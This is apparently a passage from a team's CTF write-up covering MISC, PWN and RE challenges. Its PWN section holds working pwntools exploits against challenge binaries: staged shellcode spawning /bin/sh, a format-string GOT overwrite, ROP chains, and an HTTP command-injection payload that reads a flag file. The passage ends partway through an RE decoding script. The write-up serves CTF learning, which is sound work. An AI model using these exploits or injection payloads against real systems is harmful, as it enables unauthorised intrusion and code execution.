id="MISC3-好康的硬盘-Worked-Wanan-amp-Noah"><a href="#MISC3-好康的硬盘-Worked-Wanan-amp-Noah" class="headerlink" title="MISC3-好康的硬盘 | Worked: Wanan&Noah"></a>MISC3-好康的硬盘 | Worked: <code>Wanan</code>&Noah</h3><p>The archive unpacks to a text document and a <code>rar</code> archive.</p><p>The <code>txt</code> carries a steganographic message: <a href="http://330k.github.io/misc_tools/unicode_steganography.html">Unicode Steganography with Zero-Width Characters</a>.</p><p>Extracting it gives a <code>hint</code> for the archive password: <code>minil****</code>.</p><p>Extract the hash with <code>rar2john</code> and run a mask attack with <code>hashcat</code>. Brute-forcing the full character set for the four unknown positions is too slow, so a digits-only mask was tried first, and that was enough: <code>minil4396</code>.</p><p>Extracting the archive gives a disk image; export the video file and the <code>txt</code> from it with <code>X-Ways Forensics</code> or 火眼取证 (a Chinese forensic suite).</p><p>Split the video into frames; seven of them are chat-log screenshots containing digits.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ffmpeg -i inputfile.avi -r 1 -f image2 %d.png</span><br></pre></td></tr></table></figure><p>The <code>txt</code> is a pile of odd English. The challenge calls this <code>txt</code> a strange email; pasting the whole thing into Google leads to <a href="https://www.spammimic.com/">spam-mimic steganography</a>.</p><p>It can be decoded there, but a password is required; the password is the digits from the frames. After the attachment was updated, the password came out as <code>7355608</code>, which decodes to the flag.</p><p><code>MiniLCTF{n3ver_g0nna_L3t_Y0u_dowN}</code></p><hr><h3 id="MISC4-Recombination-Worked-Noah"><a href="#MISC4-Recombination-Worked-Noah" class="headerlink" title="MISC4-Recombination | Worked: Noah"></a>MISC4-Recombination | Worked: Noah</h3><p>Trying to extract the archive prompts for a password, and <code>winrar</code> also reports that the <code>rar</code> file header is corrupted.</p><p>Time to learn the <code>rar</code> header format: <a href="https://blog.csdn.net/Claming_D/article/details/105899397"><code>rar文件头</code></a>.</p><p>The header block carries its own <code>CRC</code>; recomputing it gives a mismatch, so the header bytes have been altered.</p><p>In the <code>010</code> Editor template, edit <code>struct RarBlock block[0]</code> > <code>struct FileHeadBlock file</code> > <code>struct WinFileAttrs Attributes</code> > <code>uint32 ENCRYPTED</code>; clearing it removes the bogus password prompt.</p><p>Extracting again now succeeds and gives the contents of the <code>flag</code> file:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td 
class="code"><pre><span class="line">6753562912706753562912706753562912706753562912706753562912706753562912706753562912706753562912706950487172722950487172722950487172722950487172722950487172722950487172722950487172722950471727222918964333860418964338804418964388044418964380044418964380044418964800044489664800044489668000044485664004626755664046226555664466265555664462665555664462665555664426665556644426665556644266665556226412889288226418899282226188892822226188892822226188892822226188892822261188892822261888892822249020196212049020962212090200962120090209621120092096211200092062111200020662111200026621111200029885843713809885837113809855837138009855831338009558831380009558813380005588813300005588133300005463633443972463634433972463634439722463634399722436334397222436333997222363333992222363339992222344386089223144386892223144386892231144388922311143888923111143889231111138892311111138893111111132416578592732416578592732416578592732416578592732416578592732416578592732416578592732416785927332848838752450848838752450848838752450848838752450848838752450848838752450848838752450848838752450852130991345852130991348522130991348522130991348522130993485221309933485221309333485221309333485220249012006390249012003902449012003902449012003902449012033902449020033902449000033902449000033902290504179362290504173622905504173622955041736229555041736229555047336229555043336229555043336229523187416385523187413855521877413855518877413855588877413855588877133855588877333855588877333855589313879388409313873888409338773888493338738888493388738884933887388884938873888884938738888849338026930876524026938765240269387765242669877752242698877752242698877552226998875552226988755522266944967210137744962101377449621011377499610013774996110013774996110133779966110333799966110333799967437139642027431399642027431396442024331964420223331964200223331942200233331922202233331922202233177979889805179799889805179799898805197998988051997998980519979989880519799898805519799898805519740602284311140602284311
14060228431114060228431114060228431114060228431114060228431114060228431114986225232739986225232739986225232739986225232739986225232739986225232739986225232739986225232739978095213273378095213733778095213733778095213733778095213733778095213733770955213733770955213733771249014432511249014325111249014325111249014325111249014325111249014325112490114325112490114325112678821389354678821389546678821389566788213389566788213389566788213389567888133389567888133389567897350419414397350419443997350419439997350194439997350194439997350194439977351944439977351944439972720161949962720161949622720161949627220161949627220161949627220161946277220119446277220119446277617829659437617829659376617829659376678229659376678229659376678229653766782296537766782296537766776896396975676896396956776896396956776863996956776863996956776863999567768639995677768639995677765727440560045727440560455727440504555727405004555774050045555774050455555774050455555774050455555871010790769871010907698711010907687110109007687111090076877111090766877111090766771111090766771132380525151132380525151132380525151132380525151132380525151132380525151132380525151132380525151138780528572578780528572578780528572578780528572578780528572578780528572578780528572578780528572578768189372706768189372706768189372706768189372706768189372706768189372706768189372706768189372706701697051329901697051329901697051329016970513290166970513201669970513216699970513216999705113216992305072802352305072802352305072802523050728025230050728022300550728023005550728023005550288023005107233287161107232877161107232877111107232877111007232877110077232877100777232877100777228877100749995037049449995370044499953370044499953370044999953370049999953370049999953370049999953770049995306618285435306682884353066822884353066822843553066822843530066822843300066822843300066228843300964645420977964644209777964644209777964644297777964644297779664644297796664644297796664642977796699200739764999200397764999200397764999200377664999200377669999200377669999200377669
99920377766999272282621608272286211608272286211608272282111608272282111608272282111608272282111608272221111608284257389119984257891119984257891119984258911119984258911119984258911119984258911119984259111119981491797144281491771444281491771444281497711444281497711444814497711444144497711444144497111444144795289282054795282822054795282822054792822822054792822822047992822822079992822822079928228822079994184177940894184177940894184177940894184177940894184177940894184177940894184177940894184177940897494468598527494468598527494468598527494468598527494468598527494468598527494468598527494468598527</span><br></pre></td></tr></table></figure><p>Tried converting it to hex, treating it as <code>shellcode</code> and the other usual tricks.</p><p>Still couldn't tell what encoding or cipher it was.</p><p>Later, a <a href="https://blog.csdn.net/mochu7777777/article/details/115276176">DASCTF March round writeup</a> mentioned aa3d, and searching further turned up a <a href="https://john-doe.fun/bytectf-2020-misc-writeup/"><code>ByteCTF 2020 Misc WP</code></a>; the way the string repeats looked very similar.</p><p>So I downloaded <a href="http://aa-project.sourceforge.net/aa3d/">aa3d</a> and checked its usage: it can emit a digits-only version of the ASCII stereogram. Generating one gave exactly the same format as the challenge string:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">67535629127063562912706353562912706353562912706353562912706353562912706353562912</span><br><span class="line">68843149206868843149206868843149206868843149206868843149206868843149206868843149</span><br></pre></td></tr></table></figure><p>The string is 4559 characters long, which is exactly a 47*97 matrix.</p><p>Paste it into Notepad and take a screenshot. Open the screenshot in <code>stegsolve</code>, use <code>Analyze</code> > <code>Stereogram Solver</code>, adjust the image offset, and the <code>flag</code> appears:</p><p><img src="https://md.wanan.world/uploads/upload_57db6e2f88a325274bcf3639b83bb41c.png" class="lazyload" data-srcset="https://md.wanan.world/uploads/upload_57db6e2f88a325274bcf3639b83bb41c.png" srcset=""></p><hr><h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="PWN1-shellcode-Worked-BB"><a href="#PWN1-shellcode-Worked-BB" 
class="headerlink" title="PWN1-shellcode | Worked: BB"></a>PWN1-shellcode | Worked: BB</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># PWN1.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch = <span class="string">'amd64'</span>,os=<span class="string">'linux'</span>,log_level = <span class="string">'debug'</span>)</span><br><span class="line">p = process(<span class="string">'./shellcode_loader'</span>)</span><br><span class="line"><span class="comment">#p = remote('pwn.woooo.tech',10266)</span></span><br><span class="line">gdb.attach(p,<span class="string">"b *$rebase(0x1232)"</span>)</span><br><span class="line"></span><br><span class="line">shellcode = <span 
class="string">'''</span></span><br><span class="line"><span class="string"> mov rax, qword ptr[rsp + 0x50];</span></span><br><span class="line"><span class="string"> jmp rax;</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">shellcode2 =<span class="string">''' </span></span><br><span class="line"><span class="string"> xor rbx,rbx;</span></span><br><span class="line"><span class="string"> mov rax, qword ptr[rbp + 0x58];</span></span><br><span class="line"><span class="string"> jmp rax;</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">shellcode3 = <span class="string">''' </span></span><br><span class="line"><span class="string"> lea rdi, qword ptr[rsp + 0x70];</span></span><br><span class="line"><span class="string"> push rbx;</span></span><br><span class="line"><span class="string"> pop rsi;</span></span><br><span class="line"><span class="string"> push rsi;</span></span><br><span class="line"><span class="string"> pop rdx;</span></span><br><span class="line"><span class="string"> push rdx;</span></span><br><span class="line"><span class="string"> pop rax;</span></span><br><span class="line"><span class="string"> mov al, 59;</span></span><br><span class="line"><span class="string"> syscall;</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">shellcode = asm(shellcode) + <span class="string">b'//bin/sh'</span></span><br><span class="line">shellcode2 = asm(shellcode2)</span><br><span class="line">shellcode3 = asm(shellcode3)</span><br><span class="line"></span><br><span class="line">p.send(shellcode)</span><br><span class="line">p.sendline(shellcode2)</span><br><span class="line">p.sendline(shellcode3)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><blockquote><ol><li><p>Instructions with no operands: 1 byte</p></li><li><p>Instructions whose operands are registers only: 2 bytes<br>e.g. <code>mov bx,ax</code></p></li><li><p>Instructions whose operands involve a memory address: 3 bytes<br>e.g. <code>mov ax,ds:[bx+si+idata]</code></p></li><li><p>Instructions with an immediate operand<br>length = register width + 1<br>8-bit register, register type = 1, e.g. <code>mov al,8;</code> is 2 bytes<br>16-bit register, register type = 2, e.g. <code>mov ax,8;</code> is 3 bytes</p></li><li><p>Jump instructions<br>Two cases:</p></li></ol><ul><li><p>Intra-segment jump<br>2 or 3 bytes</p><p>The <code>jmp</code> opcode itself takes 1 byte</p><p>Intra-segment short jump: the 8-bit displacement takes one byte, plus one byte for <code>jmp</code>, so the whole instruction is 2 bytes<br>e.g. <code>jmp short opr</code></p><p>Intra-segment near jump: the 16-bit displacement takes two bytes, plus one byte for <code>jmp</code>, so the whole instruction is 3 bytes<br>e.g. <code>jmp near ptr opr</code></p></li><li><p>Inter-segment jump</p><p>5 bytes<br>e.g. <code>jmp dword ptr table[bx][di]</code><br>or <code> jmp far ptr opr</code><br>or <code> jmp dword ptr opr</code></p></li></ul><ol start="6"><li><p><code>inc</code><br>one byte</p></li><li><p><code>push</code><br>one byte</p></li><li><p><code>segment</code> declaration<br>two bytes<br>e.g. <code>codesg segment</code></p></li><li><p><code>int 21h</code><br>two bytes</p></li></ol></blockquote><p>Those rules are for 16-bit 8086 code; the shellcode here is 64-bit, so the only reliable size for each stage is what <code>len(asm(...))</code> reports, which is what the byte tallies in the comments of the exp below are checking.</p><p>Then, both while solving and afterwards, I was being an idiot; here is a record of how I got scolded and why:</p><p>This is my first <code>exp</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span 
class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch = <span class="string">'amd64'</span>,os=<span class="string">'linux'</span>,log_level = <span class="string">'debug'</span>)</span><br><span class="line">p = process(<span class="string">'./shellcode_loader'</span>)</span><br><span class="line"><span class="comment">#p = remote('pwn.woooo.tech',10063)</span></span><br><span class="line"><span class="comment">#gdb.attach(p,"b *$rebase(0x1232)")</span></span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">'''</span></span><br><span class="line"><span class="string"> mov rax, qword ptr[rsp + 0x50];</span></span><br><span class="line"><span class="string"> jmp rax;</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">shellcode = asm(shellcode, arch=<span class="string">'amd64'</span>, os=<span class="string">'linux'</span>) + <span class="string">b"//bin/sh"</span></span><br><span class="line"><span class="comment"># 3 + 4 + 1 + 7 = 15</span></span><br><span class="line">p.sendline(shellcode)</span><br><span class="line"></span><br><span class="line">shellcode2 = <span class="string">''' </span></span><br><span class="line"><span class="string"> lea rdi, byte ptr[rsp + 0x40];</span></span><br><span class="line"><span class="string"> push rbx;</span></span><br><span class="line"><span class="string"> pop rsi;</span></span><br><span class="line"><span class="string"> push rsi;</span></span><br><span class="line"><span class="string"> pop rdx;</span></span><br><span class="line"><span class="string"> push rdx;</span></span><br><span class="line"><span class="string"> pop rax;</span></span><br><span class="line"><span class="string"> mov al, 59;</span></span><br><span class="line"><span class="string"> syscall;</span></span><br><span 
class="line"><span class="string">'''</span></span><br><span class="line"><span class="comment"># 5 + 1*6 + 3 + 1 = 15</span></span><br><span class="line">shellcode2 = asm(shellcode2, arch=<span class="string">'amd64'</span>, os=<span class="string">'linux'</span>)</span><br><span class="line">p.send(shellcode2)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><p>It worked locally but never remotely. It also worked on <code>ubuntu18</code> and <code>16</code> (I just hadn't tried <code>ubuntu20</code>, because I remembered shellcode execution on <code>ubuntu20</code> being a bit problematic). In the end I did try <code>ubuntu2004</code> and found the problem: <code>rbx</code> is not necessarily <code>0</code>.</p><p>OK, now the story of how <code>bb</code> got scolded</p><p><img src="https://i.loli.net/2021/05/08/LaHl4dtFIEcb1JC.png" class="lazyload" data-srcset="https://i.loli.net/2021/05/08/LaHl4dtFIEcb1JC.png" srcset="" alt="eqqieyyds0.png"></p><p>This is <code>bb</code> working locally but not remotely.</p><p><img src="https://i.loli.net/2021/05/08/vVDIqnHemSRodXN.png" class="lazyload" data-srcset="https://i.loli.net/2021/05/08/vVDIqnHemSRodXN.png" srcset="" alt="eqqieyyds1.png"></p><p>This is the remote one working and getting the <code>flag</code></p><p>By the way, this is the best answer:</p><p><img src="https://i.loli.net/2021/05/08/rldh9mqbM3nyzuj.png" class="lazyload" data-srcset="https://i.loli.net/2021/05/08/rldh9mqbM3nyzuj.png" srcset="" alt="eqqieyyds2.png"></p><hr><h3 id="PWN2-easy-repeater-Worked-BB"><a href="#PWN2-easy-repeater-Worked-BB" class="headerlink" title="PWN2-easy_repeater | Worked: BB"></a>PWN2-easy_repeater | Worked: BB</h3><p>A simple giveaway.</p><h4 id="EXP-3"><a href="#EXP-3" class="headerlink" title="EXP"></a>EXP</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">binary = <span class="string">'./baby_repeater'</span></span><br><span class="line">context(arch=<span class="string">'amd64'</span>, os=<span class="string">'linux'</span>,log_level=<span class="string">'debug'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">#p = 
process(binary,env={'LD_PRELOAD':'./libc-2.31.so'})</span></span><br><span class="line">p = remote(<span class="string">'pwn.woooo.tech'</span>, <span class="number">10209</span>)</span><br><span class="line">elf = ELF(binary)</span><br><span class="line">libc = ELF(<span class="string">"./libc-2.31.so"</span>)</span><br><span class="line"></span><br><span class="line">ru = <span class="keyword">lambda</span> x:p.recvuntil(x)</span><br><span class="line">sla = <span class="keyword">lambda</span> x,y:p.sendlineafter(x,y)</span><br><span class="line">sa = <span class="keyword">lambda</span> x,y:p.sendafter(x,y)</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(p, 'b *$rebase(0x145d)\nc\nx/gx $rebase(0x3258)\n')</span></span><br><span class="line">sla(<span class="string">"> "</span>,<span class="string">b'%111$p'</span>)</span><br><span class="line">ru(<span class="string">"Your sentence: 0x"</span>)</span><br><span class="line"></span><br><span class="line">libc_start_addr = <span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>)</span><br><span class="line">libc_base = libc_start_addr - libc.sym[<span class="string">'__libc_start_main'</span>] - <span class="number">243</span></span><br><span class="line">shell_addr = libc_base + <span class="number">0xe6c81</span></span><br><span class="line"></span><br><span class="line">log.success(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">log.success(<span class="string">'shell_addr--->'</span>+<span class="built_in">hex</span>(shell_addr))</span><br><span class="line"></span><br><span class="line">sla(<span class="string">"> "</span>,<span class="string">b'%107$p'</span>)</span><br><span class="line">ru(<span class="string">"Your sentence: 0x"</span>)</span><br><span class="line">main_addr = <span class="built_in">int</span>(p.recv(<span class="number">12</span>),<span class="number">16</span>) - <span 
class="number">42</span></span><br><span class="line">log.success(<span class="string">'main_addr--->'</span>+<span class="built_in">hex</span>(main_addr))</span><br><span class="line"></span><br><span class="line">base = main_addr - <span class="number">0x14d5</span></span><br><span class="line"></span><br><span class="line">hook_got = elf.got[<span class="string">'exit'</span>] + base</span><br><span class="line">log.success(<span class="string">"hook_got---->"</span>+<span class="built_in">hex</span>(hook_got))</span><br><span class="line">payload1=fmtstr_payload(<span class="number">8</span>, {hook_got: shell_addr},numbwritten=<span class="number">15</span>)</span><br><span class="line">log.info(<span class="built_in">str</span>(<span class="built_in">len</span>(payload1)))</span><br><span class="line">sla(<span class="string">"> "</span>,payload1)</span><br><span class="line">print(payload1)</span><br><span class="line">sla(<span class="string">"> "</span>,<span class="string">"exit"</span>)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">0xe6c7e execve("/bin/sh", r15, r12)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string"> [r12] == NULL || r12 == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe6c81 execve("/bin/sh", r15, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [r15] == NULL || r15 == NULL</span></span><br><span class="line"><span class="string"> [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">0xe6c84 
execve("/bin/sh", rsi, rdx)</span></span><br><span class="line"><span class="string">constraints:</span></span><br><span class="line"><span class="string"> [rsi] == NULL || rsi == NULL</span></span><br><span class="line"><span class="string"> [rdx] == NULL || rdx == NULL</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">'''</span></span><br></pre></td></tr></table></figure><hr><h3 id="PWN3-twins-Worked-BB"><a href="#PWN3-twins-Worked-BB" class="headerlink" title="PWN3-twins | Worked: BB"></a>PWN3-twins | Worked: BB</h3><p>“Mimic defense”: seeing this for the first time was quite interesting...</p><p>Still a fairly simple one <code>=_=</code></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span 
class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> * </span><br><span class="line">binary = <span class="string">'./pwn1'</span></span><br><span class="line">context(log_level=<span class="string">'debug'</span>)</span><br><span class="line">p=process(binary)</span><br><span class="line">p = remote(<span class="string">"pwn.woooo.tech"</span>, <span class="number">10268</span>)</span><br><span class="line">ru = <span class="keyword">lambda</span> x:p.recvuntil(x)</span><br><span class="line">sla = <span class="keyword">lambda</span> x,y:p.sendlineafter(x,y)</span><br><span class="line">sa = <span class="keyword">lambda</span> x,y:p.sendafter(x,y)</span><br><span class="line">sl = <span class="keyword">lambda</span> x:p.sendline(x)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 64</span></span><br><span class="line">pop_rax = <span class="number">0x0000000000451a57</span></span><br><span class="line">pop_rdi = <span class="number">0x000000000040185a</span></span><br><span class="line">pop_rdx = <span class="number">0x000000000040175f</span></span><br><span class="line">pop_rsi = <span class="number">0x000000000040f3fe</span></span><br><span class="line">binsh_addr_x64 = <span class="number">0x00000004c5220</span></span><br><span class="line">syscall_ret = <span class="number">0x000000487c99</span></span><br><span class="line">add_rsp = <span class="number">0x00000000004029c2</span> <span class="comment"># 
0x98</span></span><br><span class="line"><span class="comment"># 32</span></span><br><span class="line">gets_addr = <span class="number">0x8058474</span></span><br><span class="line">pop_eax = <span class="number">0x080b05ca</span></span><br><span class="line">pop_edx_ebx = <span class="number">0x0805ede9</span></span><br><span class="line">pop_ecx = <span class="number">0x080642b1</span></span><br><span class="line">binsh_addr = <span class="number">0x80e83c0</span></span><br><span class="line">int_addr = <span class="number">0x0804a402</span></span><br><span class="line">add_esp = <span class="number">0x0804b08e</span> <span class="comment">#0x2c</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b'a'</span>*<span class="number">0x44</span> + <span class="string">b'b'</span>*<span class="number">0x4</span></span><br><span class="line">payload += p32(add_esp)</span><br><span class="line">payload += <span class="string">b'c'</span>*<span class="number">12</span></span><br><span class="line">payload += p64(add_rsp)</span><br><span class="line">payload += <span class="string">b'd'</span>*<span class="number">24</span></span><br><span class="line"></span><br><span class="line">payload += p32(gets_addr) + p32(pop_eax) + p32(binsh_addr)</span><br><span class="line">payload += p32(pop_ecx) + p32(<span class="number">0</span>)</span><br><span class="line">payload += p32(pop_edx_ebx) + p32(<span class="number">0</span>) + p32(binsh_addr)</span><br><span class="line">payload += p32(pop_eax) + p32(<span class="number">0xb</span>)</span><br><span class="line">payload += p32(int_addr)</span><br><span class="line"></span><br><span class="line">payload += <span class="string">b'd'</span>*<span class="number">0x54</span></span><br><span class="line">payload += p64(pop_rax) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(pop_rdi) + p64(<span class="number">0</span>)</span><br><span class="line">payload 
+= p64(pop_rsi) + p64(binsh_addr_x64)</span><br><span class="line">payload += p64(pop_rdx) + p64(<span class="number">0x100</span>)</span><br><span class="line">payload += p64(syscall_ret)</span><br><span class="line">payload += p64(pop_rax) + p64(<span class="number">59</span>)</span><br><span class="line">payload += p64(pop_rdi) + p64(binsh_addr_x64)</span><br><span class="line">payload += p64(pop_rsi) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(pop_rdx) + p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(syscall_ret)</span><br><span class="line"></span><br><span class="line">sla(<span class="string">"say ?\n"</span>, payload)</span><br><span class="line">sl(<span class="string">b'/bin/sh\x00'</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure><hr><h3 id="PWN4-Cross-Platform-Calculator-Worked-BB-amp-Noah-amp-Wanan"><a href="#PWN4-Cross-Platform-Calculator-Worked-BB-amp-Noah-amp-Wanan" class="headerlink" title="PWN4-Cross Platform Calculator | Worked:BB&Noah&Wanan"></a>PWN4-Cross Platform Calculator | Worked:BB&Noah&Wanan</h3><p>My approach was correct from the very start!!!!</p><p>I found a <code>web</code> player to help me with the command injection~</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">'./httpd'</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p,"b *$rebase(0x160E)")</span></span><br><span class="line"><span 
class="built_in">input</span>()</span><br><span class="line">payload = <span class="string">'''GET /calc?x=`cat$IFS./flag`));echo$IFS$((1&y=1&action=add HTTP/1.1\r\n'''</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recv()</span><br><span class="line">p.recv()</span><br></pre></td></tr></table></figure><hr><h2 id="RE"><a href="#RE" class="headerlink" title="RE"></a>RE</h2><h3 id="RE2-sub-Worked-BB-amp-Noah"><a href="#RE2-sub-Worked-BB-amp-Noah" class="headerlink" title="RE2-sub | Worked: BB&Noah"></a>RE2-sub | Worked: BB&Noah</h3><p>Process hollowing (a puppet process), with an appended section.</p><p>Looking at the sections reveals <code>.what?</code>; it is fairly easy to see that every byte is XORed with a fixed value. Derive the <code>key</code> from the file header, then recover the real process.</p><p><code>dump</code> the memory and re-analyze it directly.</p><p>Obviously, this is a</p><p>The <code>check</code> function is effectively a function pointer (it should be called a vtable structure); press <code>x</code> on it and you find it has another function</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">key=[<span class="number">0x5A</span>,<span class="number">0x46</span>,<span class="number">0x59</span>,<span class="number">0x46</span>,<span class="number">0x7B</span>,<span class="number">0x5C</span>,<span class="number">0x43</span>,<span class="number">0x51</span>,<span class="number">0x74</span>,<span class="number">0x63</span>,<span class="number">0x47</span>,<span class="number">0x0E</span>,<span class="number">0x4C</span>,<span class="number">0x68</span>,<span class="number">0x0E</span>,<span class="number">0x4C</span>,<span class="number">0x68</span>,<span class="number">0x43</span>,<span class="number">0x47</span>,<span class="number">0x3</span>,<span 
class="number">0x68</span>,<span class="number">0x51</span>,<span class="number">0x5E</span>,<span class="number">0x44</span>,<span class="number">0x3</span>,<span class="number">0x68</span>,<span class="number">0x51</span>,<span class="number">0x0E</span>,<span class="number">0x5E</span>,<span class="number">0x50</span>,<span class="number">0x1E</span>,<span class="number">0x4A</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">32</span>):</span><br><span class="line"> tmp = key[i]^<span class="number">0x55</span></span><br><span class="line"> tmp -= <span class="number">4</span></span><br><span class="line"> print(<span class="built_in">chr</span>(tmp^<span class="number">0x66</span>),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment">#miniLctf{Th1s_1s_th4_fak4_f1ag!}</span></span><br><span class="line"></span><br><span class="line">key = [<span class="number">0x5A</span>,<span class="number">0x26</span>,<span class="number">0x59</span>,<span class="number">0x26</span>,<span class="number">0x7B</span>,<span class="number">0x5C</span>,<span class="number">0x43</span>,<span class="number">0x51</span>,<span class="number">0x54</span>,<span class="number">0x6D</span>,<span class="number">0x52</span>,<span class="number">0x68</span>,<span class="number">0x0E</span>,<span 